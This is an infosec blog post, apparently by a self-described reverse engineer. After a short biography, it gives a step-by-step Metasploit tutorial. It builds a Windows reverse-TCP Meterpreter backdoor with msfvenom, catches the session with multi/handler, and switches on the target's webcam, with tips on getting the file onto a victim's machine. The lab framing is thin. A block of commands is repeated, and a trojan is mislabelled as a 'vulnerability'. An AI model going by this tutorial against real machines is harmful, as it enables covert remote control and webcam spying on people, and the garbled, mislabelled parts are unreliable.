Don't Think About Being a Black Hat

I am Nikhil Rathor (call me honey), a security researcher and reverse engineer. My parents say that have been 'reversing since childhood' because I have been so connected to technology from childhood. My father taught me programming from a very early age and it has been my passion ever since.  I was lucky, I got a good education from Indian government college's and if you know anything about India then you know it is hard for a student to get into a government college.

How I Got Into Reversing

Ever since I was a kid I wanted to break things to see how they worked, I was always willing to learn about hacking and security for as long as I can remember, the first and the last reason I consider myself to be a competent security researcher.

In my early days I got involved with black hat things and it is my greatest regret.

Since then people have told me that being a white hat is a far better option for me and so I am now focused on white hat activities like reversing malware, exploits and the various "crackme" puzzles out there. Later in the year I plan to tackle the bug bounties I see on hackerone and bugcrowd. Whichever way I look at it, hacking for the bounties is even far better than the doing the sh#tty black hat things.

Here are my github projects and also the reverse engineered code of WhatsApp, I have been happy the last few months and everyone seems to appreciate my work.

My Favorite Vulnerability

For the next part of this article I want to focus on my favorite vulnerability that can be used for exploiting Windows, this has been out in the wild for a while now. We will specifically be hacking into my lab Windows environment and turn on the webcam livestream from a meterpreter session open in my Linux device.

Getting your tools ready

1) First you need the Metasploit-Framework by Rapid7, find it an install it.

Then run the following command to fire up metasploit :

$msfconsole

2) Next you need to install PostgreSQL, for that simply run this command:

$sudo apt-get install postgresql

Then run the following command to start the service postgresql:

$service postgresql start

Now i assume that you have installed both the above mentioned tools and so let’s explore how you can hack into windows .

3) Creating The Payload

To create the PE (Portable Executable) Windows file based backdoor :

Using the msfvenom to create the backdoor.

$msfvenom  -p windows/meterpreter/reverse_tcp lhost=<ip address of your linux  machine> lport=4444 -f exe -o /root/Desktop/0xh0n3y.exe

Note:- To obtain your ip address type the following command:

$ifconfig

Before you move further to exploit windows you have to transfer the exploit to the windows machine and run it after you execute the command “exploit".

Note:-  Easiest way to transfer the exploit to windows is by using USB/pendrive or host a website for your exploit to be downloaded via web browser onto windows.

Exploiting Windows Using Metasploit:

After installing Metasploit just execute command :

$msfconsole

Then after execute command :

$msf5> use exploit/multi/handler

$msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

$msf5 exploit(multi/handler) > set lhost <ip address of your linux machine>

$msf5 exploit(multi/handler) > set lport 4444

$msf5 exploit(multi/handler) > show options

$msf5 exploit(multi/handler) > exploit

As meterpreter session starts :

$meterpreter > help

$msf5> use exploit/multi/handler

$msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

$msf5 exploit(multi/handler) > set lhost <ip address of your linux machine>

$msf5 exploit(multi/handler) > set lport 4444

$msf5 exploit(multi/handler) > show options

$msf5 exploit(multi/handler) > exploit

As meterpreter session starts :

$meterpreter > help

Now you have full control on the windows device and as you execute help command you will get a list of commands you can execute on linux machine  for taking advantage and exploiting windows device.

And if you need to turn on the webcam of the Windows using your Linux then here a command for that :

$meterpreter>webcam_stream

Happy Hacking!!!

You can check out my Medium blog here, I was also mentioned on TheHackersNews.

Thanks for reading and giving your precious time. I hope you find this blog interesting, please share your views with me . It’s just another infosec blog from me and if you like my blog you can follow me on Twitter and Medium.